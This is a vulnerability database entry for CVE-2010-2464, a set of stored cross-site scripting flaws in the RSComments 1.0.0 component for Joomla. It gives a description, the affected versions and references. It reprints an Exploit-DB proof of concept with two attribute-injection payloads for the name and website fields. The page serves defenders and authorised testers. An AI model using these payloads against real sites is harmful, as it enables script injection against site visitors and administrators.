CVE-2010-2464
Description
Multiple cross-site scripting (XSS) vulnerabilities in the RSComments (com_rscomments) component 1.0.0 Rev 2 for Joomla! allow remote attackers to inject arbitrary web script or HTML via the (1) website and (2) name parameters to index.php.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Joomla! Component RSComments 1.0.0 - Persistent Cross-Site Scripting
# Exploit Title: Joomla Component RSComments 1.0.0 Multiple XSS
Vulnerabilities
# Date: 18 May 2010
# Author: jdc
# Software Link: http://www.rsjoomla.com
# Version: 1.0.0
# Tested on: PHP5, MySQL5
Name Field Persistent XSS
-------------------------
x"/style="position:absolute;top:0;left:0;width:999pc;height:999pc"/onmouseover="alert(1)//"
NOTE: ONLY executes in backend!
Website Field Persistent XSS
----------------------------
http://x"/style="position:absolute;top:0;left:0;width:999pc;height:999pc"/onmouseover="alert(1)//"
NOTE: also executes in backend!
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| rsjoomla | com_rscomments | 1.0.0 | |
| joomla | joomla\! | | |
References
- http://packetstormsecurity.org/1006-exploits/joomlarscomments-xss.txt
- http://secunia.com/advisories/40278
- http://www.exploit-db.com/exploits/13935
- http://www.rsjoomla.com/customer-support/documentations/96--general-overview-of-the-component/393-changelog.html
- http://www.securityfocus.com/bid/40977
- https://exchange.xforce.ibmcloud.com/vulnerabilities/59578
- http://packetstormsecurity.org/1006-exploits/joomlarscomments-xss.txt
- http://secunia.com/advisories/40278
- http://www.exploit-db.com/exploits/13935
- http://www.rsjoomla.com/customer-support/documentations/96--general-overview-of-the-component/393-changelog.html
- http://www.securityfocus.com/bid/40977
- https://exchange.xforce.ibmcloud.com/vulnerabilities/59578
CWEs
CWE-79
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.